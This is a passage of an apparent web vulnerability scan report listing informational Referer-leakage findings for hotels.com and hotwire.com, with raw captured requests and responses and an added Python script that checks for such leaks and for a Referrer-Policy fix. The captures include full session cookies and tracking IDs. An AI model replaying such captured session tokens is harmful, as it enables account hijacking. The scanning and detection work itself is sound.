<a href="https://secure.opinionlab.com/ccc01/o.asp?id=YIbVvQSw&propertyid=109368&pos=HCOM_US&custom_var=e206d102-4853-4dd2-9d9b-23d14562d0f1&referer=http%3A%2F%2Fen_US.www.hotels.com%2Fhotel%2Fdetails.html" class="hcomPopup">
<span>
...[SNIP]...
<li><a href="http://www.hoteles.com" title="Español" lang="es" hreflang="es">Español</a>
...[SNIP]...
<li><a href="http://www.hoteis.com" title="Português" lang="pt" hreflang="pt">Português</a>
...[SNIP]...
<td width="135" align="right" valign="top">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.hotels.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<br />
<a href="http://www.verisign.com/ssl-certificate/" target="_blank" style="color:#000000; text-decoration:none; font:bold 7px verdana,sans-serif; letter-spacing:.5px; text-align:center; margin:0px; padding:0px;">ABOUT SSL CERTIFICATES</a>
...[SNIP]...
<li>
<a href="https://joinexpedia.com/default.asp?lang=uk" rel="nofollow">
Add Hotel</a>
...[SNIP]...
<li>
<a href="http://www.expediaaffiliate.com/" rel="nofollow">
Private Label</a>
...[SNIP]...
<li>
<a href="http://www.advertising.expedia.com" rel="nofollow">
Promote with Us</a>
...[SNIP]...
<li>
<a href="http://www.agentrez.com/" rel="nofollow">
Travel Agents</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js" async="true"></script>
<iframe src="http://fls.doubleclick.net/activityi;src=3057879;type=prope724;cat=prope480;u1=US;u2=Boston;u3=Boston Omni Parker House Hotel;u4=Merchant;u5=109368;u6=289.00;u11=4;u15=1401516;u16=04%2F10%2F11-07%2F10%2F11;ord=42823804?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

19.200. http://www.hotels.com/hotel/hoteldata.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/hoteldata.html

Issue detail

The page was loaded from a URL containing a query string (the XMLHttpRequest below). The response contains the following link to another domain:

Request

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:28:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=103.4.1.i6%3A132.2.0.i2%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:56 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTAzLjQuMS5pNjoxMzIuMi4wLmkyfEhDT01fVVMhRSoxMDkzNjh8MDQvMTAvMjAxMXwwNy8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:57 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h
...[SNIP]...
</span>
<a href="http://hcom.tripadvisor.com/Hotel_Review-g60745-d89599-Reviews-m11419-Omni_Parker_House-Boston_Massachusetts.html" rel="nofollow" target="_blank">
See all <em>
...[SNIP]...

19.201. http://www.hotels.com/search.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search.do

Issue detail

The page was loaded from a URL containing a query string (the request below). The response contains the following links to other domains:

Request

GET /search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:04 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=ZgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:04 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Content-Length: 368925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<li><a href="http://www.hoteles.com" title="Español" lang="es" hreflang="es">Español</a>
...[SNIP]...
<li><a href="http://www.hoteis.com" title="Português" lang="pt" hreflang="pt">Português</a>
...[SNIP]...
<td width="135" align="right" valign="top">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.hotels.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<br />
<a href="http://www.verisign.com/ssl-certificate/" target="_blank" style="color:#000000; text-decoration:none; font:bold 7px verdana,sans-serif; letter-spacing:.5px; text-align:center; margin:0px; padding:0px;">ABOUT SSL CERTIFICATES</a>
...[SNIP]...
<li>
<a href="https://joinexpedia.com/default.asp?lang=uk" rel="nofollow">
Add Hotel</a>
...[SNIP]...
<li>
<a href="http://www.expediaaffiliate.com/" rel="nofollow">
Private Label</a>
...[SNIP]...
<li>
<a href="http://www.advertising.expedia.com" rel="nofollow">
Promote with Us</a>
...[SNIP]...
<li>
<a href="http://www.agentrez.com/" rel="nofollow">
Travel Agents</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js" async="true"></script>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=109368;u13=324884;u14=255157;u15=1643195;u16=04%2F10%2F11-07%2F10%2F11;u18=2;ord=73008363?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
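As an added example (not part of the XSS.CX report and not the scanner's own code), the Python script below reproduces the check behind the Issue detail of 19.198 through 19.201 over constructed samples: it pulls every href/src/action target out of a captured response, including an unquoted attribute (as in the VeriSign seal of 19.198) and a link inside an XML CDATA section (as in the hoteldata.html response of 19.200), keeps the ones on a host other than the requested one, and reports whether the request's query string would reach them in the Referer header. It goes beyond what the 2011 report covers in one respect: it also evaluates a Referrer-Policy header or meta tag as the mitigation. The sample request URLs and response fragments are constructed to match the shapes seen above, and the `same-origin` policy used in the usage run is an assumed hardening, not something these sites served.

```python
import re
from urllib.parse import urlsplit

# Attributes whose URL value makes the browser fetch the target and so send it a
# Referer. Accepts "...", '...' and unquoted values (the VeriSign seal <script>
# in 19.198 is unquoted).
_URL_ATTR_RE = re.compile(
    r"""\b(?:href|src|action)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""",
    re.IGNORECASE)
# <meta name="referrer" content="..."> with name before content (assumed order).
_META_REFERRER_RE = re.compile(
    r"""<meta\s+[^>]*name\s*=\s*["']?referrer["']?[^>]*content\s*=\s*["']?([^"'\s>]+)""",
    re.IGNORECASE)
# Referrer-Policy values under which a cross-origin Referer carries at most the
# origin, so the query string of the referring URL can no longer leak.
_QUERY_STRIPPING_POLICIES = {
    "no-referrer", "same-origin", "origin", "strict-origin",
    "origin-when-cross-origin", "strict-origin-when-cross-origin"}


def extract_urls(body):
    """Every href/src/action value in the body, with '&amp;' unescaped.
    A regex rather than html.parser, so markup inside a CDATA section (the
    hoteldata.html XML response in 19.200) is scanned as well."""
    urls = []
    for m in _URL_ATTR_RE.finditer(body):
        value = next(g for g in m.groups() if g is not None)
        urls.append(value.replace("&amp;", "&").strip())
    return urls


def cross_domain_targets(request_url, body):
    """Targets on a host other than the requested one. Absolute and
    protocol-relative (//host/...) URLs count; path-relative ones stay on the
    same host. referer_sent_by_default records the browser default: no Referer
    is sent from an https page to an http target."""
    req = urlsplit(request_url)
    req_host = (req.hostname or "").lower()
    targets = []
    for value in extract_urls(body):
        try:
            target = urlsplit(value, scheme=req.scheme)
        except ValueError:  # malformed authority part, e.g. an unclosed '['
            continue
        host = (target.hostname or "").lower()
        if not host or host == req_host:
            continue
        downgrade = req.scheme == "https" and target.scheme == "http"
        targets.append({"host": host, "url": value,
                        "referer_sent_by_default": not downgrade})
    return targets


def effective_policy(response_headers, body):
    """Referrer-Policy header if present, else <meta name="referrer"> (the
    spec's precedence between the two is simplified here)."""
    for name, value in response_headers:
        if name.lower() == "referrer-policy":
            return value.strip().lower()
    m = _META_REFERRER_RE.search(body)
    return m.group(1).lower() if m else None


def referer_leak_report(request_url, response_headers, body):
    """The conditions behind the Issue detail above in one place: a query string
    on the requested URL, third-party targets in the response, and whether a
    Referrer-Policy strips the query before it reaches them."""
    query = urlsplit(request_url).query
    policy = effective_policy(response_headers, body)
    targets = cross_domain_targets(request_url, body)
    reachable = [t for t in targets if t["referer_sent_by_default"]]
    return {
        "query_string": query,
        "policy": policy,
        "third_party_hosts": sorted({t["host"] for t in targets}),
        "leaks_query": bool(query) and bool(reachable)
                       and policy not in _QUERY_STRIPPING_POLICIES,
    }


# Constructed samples, modelled on the hotelplanner.com search response above
# and on the hoteldata.html XML response in 19.200.
SAMPLE_URL = "http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&sc=IGoUGo"
SAMPLE_HTML = """
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=113791&amp;NumRooms=1"><img src="//cdn.hotelplanner.com/Common/Images/FacebookSmall.gif"></a>
<script src=https://seal.verisign.com/getseal?host_name=WWW.HOTELPLANNER.COM&size=S></script>
<a href="http://www.hoteles.com" hreflang="es">Español</a>
"""
SAMPLE_XML_URL = "http://www.hotels.com/hotel/hoteldata.html?hotelId=109368"
SAMPLE_XML = """<additional-hotel-data><trip-advisor><ta-reviews-trigger><![CDATA[
<a href="http://hcom.tripadvisor.com/Hotel_Review-g60745-d89599.html" rel="nofollow">See all</a>
]]></ta-reviews-trigger></trip-advisor></additional-hotel-data>"""

if __name__ == "__main__":
    print(referer_leak_report(SAMPLE_URL, [], SAMPLE_HTML))
    print(referer_leak_report(SAMPLE_URL, [("Referrer-Policy", "same-origin")], SAMPLE_HTML))
    print(referer_leak_report(SAMPLE_XML_URL, [], SAMPLE_XML))
```

Run as a script it prints the report for the hotelplanner search sample (query leaks to four hosts), the same sample with an assumed `Referrer-Policy: same-origin` (no leak) and the XML sample (one TripAdvisor link inside CDATA). The comparison is by exact host, so a CDN on the same registrable domain such as cdn.hotelplanner.com is listed alongside genuine third parties; filter on registrable domain if that noise matters. The https-to-http case is the caveat worth remembering when triaging an https page like 19.198: an `http://` image or link there does not carry the Referer at all under the browser default, while the `https://seal.verisign.com` script does.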

19.202. http://www.hotels.com/search/search.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search/search.html

Issue detail

The page was loaded from a URL containing a query string (the request below). The response contains the following links to other domains:

Request

GET /search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=PfwAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//"; user=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=DvwAAAAAAAEAAAAAAAAAAAAAAAMAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:34 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: user=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.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Content-Length: 371034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<li><a href="http://www.hoteles.com" title="Español" lang="es" hreflang="es">Español</a>
...[SNIP]...
<li><a href="http://www.hoteis.com" title="Português" lang="pt" hreflang="pt">Português</a>
...[SNIP]...
<td width="135" align="right" valign="top">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.hotels.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<br />
<a href="http://www.verisign.com/ssl-certificate/" target="_blank" style="color:#000000; text-decoration:none; font:bold 7px verdana,sans-serif; letter-spacing:.5px; text-align:center; margin:0px; padding:0px;">ABOUT SSL CERTIFICATES</a>
...[SNIP]...
<li>
<a href="https://joinexpedia.com/default.asp?lang=uk" rel="nofollow">
Add Hotel</a>
...[SNIP]...
<li>
<a href="http://www.expediaaffiliate.com/" rel="nofollow">
Private Label</a>
...[SNIP]...
<li>
<a href="http://www.advertising.expedia.com" rel="nofollow">
Promote with Us</a>
...[SNIP]...
<li>
<a href="http://www.agentrez.com/" rel="nofollow">
Travel Agents</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js" async="true"></script>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=105311;u13=114243;u14=203448;u15=1401516;u16=14%2F10%2F11-16%2F10%2F11;u18=2;ord=3653678?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

19.203. http://www.hotwire.com/hotel/details.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/details.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665 HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=974DB21E0DA548F45875D88836CCB561; SaneID=974DB21E0DA548F45875D88836CCB56; NSC_qspe-xxx-qfstjtu=ffffffffaf131c8e45525d5f4f58455e445a4a422d6f; hwAnalytics_previousPageName=hotel.results; gsc=1; hotwireLogin=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; hotwirePageModuleState=pgoodCode=H&searchTokenId=1; s_cpm=%5B%5B'sid%253AS250%252Cbid%253AB260711'%2C'1317602289069'%5D%5D; s_vi=[CS]v1|274481F985012F24-6000010920164B07[CE]; quoter_buyer=HQ; s_cc=true; s_sq=%5B%5BB%5D%5D; hwAnalytics_lid=hotel.results.opaque%3Abooking-nav%3Acontinue; hwAnalytics_crossPageVariables=%7B%22prop61%22%3A%22social-proof-m%22%2C%22eVar41%22%3A%222%22%2C%22eVar34%22%3A%22FLU01-01%22%7D; s_nr=1317603699724

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 01:01:43 GMT
Content-Length: 131060


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="Content-Language" content="en-us"/>
<meta http-equ
...[SNIP]...
ngsv02.html" l gen true for "http://www.hotwire.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.hotwire.com" r (n 0 s 0 v 0 l 0))' />


<link rel="shortcut icon" href="http://ak-static.hotwirestatic.com/static/images/favicon2.ico?ver=207657"/>
<link rel="stylesheet" type="text/css" href="http://ak-static.hotwirestatic.com/static/deploy/master/hwCore.css?ver=216778"/>


<script>
...[SNIP]...
</script>


<script src="http://ak-static.hotwirestatic.com/static/deploy/master/hwCore.js?ver=219395"></script>


<link rel="stylesheet" href="http://ak-static.hotwirestatic.com/static/deploy/??css/hotelDetails-sprite.css,css/purchasePath-sprite.css,css/details.css,css/hotels-sprite.css,css/tripWatcherLayout.css,css/promoUnit.css,ver=222153" type="text/css"/>

<link rel="stylesheet" href="http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css?ver=209738" media="print" type="text/css"/>


<script>
...[SNIP]...
</script>


<a href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Hotels&sid=S287&bid=B312633" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.header',
link:'dest4'});"
target="_new">

<span class="dealPrice">
...[SNIP]...
</a>
<a class="rightText" href="http://www.travel-ticker.com/category.jsp?actionType=1&categoryType=Type&categoryName=Hotels&sid=S287&bid=B312633" onclick="AnalyticsSupport.logOmnitureLinkEvent({moduleName:'tt.header',
link:'dest4'});"
target="_new">

<img src="http://ak-static.hotwirestatic.com/static/images/travel-ticker/tt-hw-logo2.png?ver=169988"
class="ttHwLogo"
width="153"
height="18"
alt="Get great deals at www.travel-ticker.com"/>

<span class="staticMessage">
...[SNIP]...
<a href="http://www.hotwire.com/index.jsp" onclick="AnalyticsSupport.storeLinkId({moduleName:'NAV-LOGO',linkName:'HOTWIRE'});"><img src="http://ak-static.hotwirestatic.com/static/images/shell/hotwire-logo-3d.gif?ver=222960" width="165" height="33" border="0" alt="Hotwire.com Home"/></a>
...[SNIP]...
href="#" title="Help"
onclick="CompSupport.callJsObj('currencyHelpLayer', 'show', this); AnalyticsSupport.logOmnitureLinkEvent({moduleName:'curr-help', link: 'help1'}); return false;">
<img class='iconNormal' src='http://ak-static.hotwirestatic.com/static/images/global/icon-whats-this.gif?ver=193627' alt="Help"/>
</a>
...[SNIP]...
<h1>

<img src="http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif?ver=222796"
border="0" width="183" height="23" alt="About your hotel."/>


</h1>
...[SNIP]...
<div class="body">


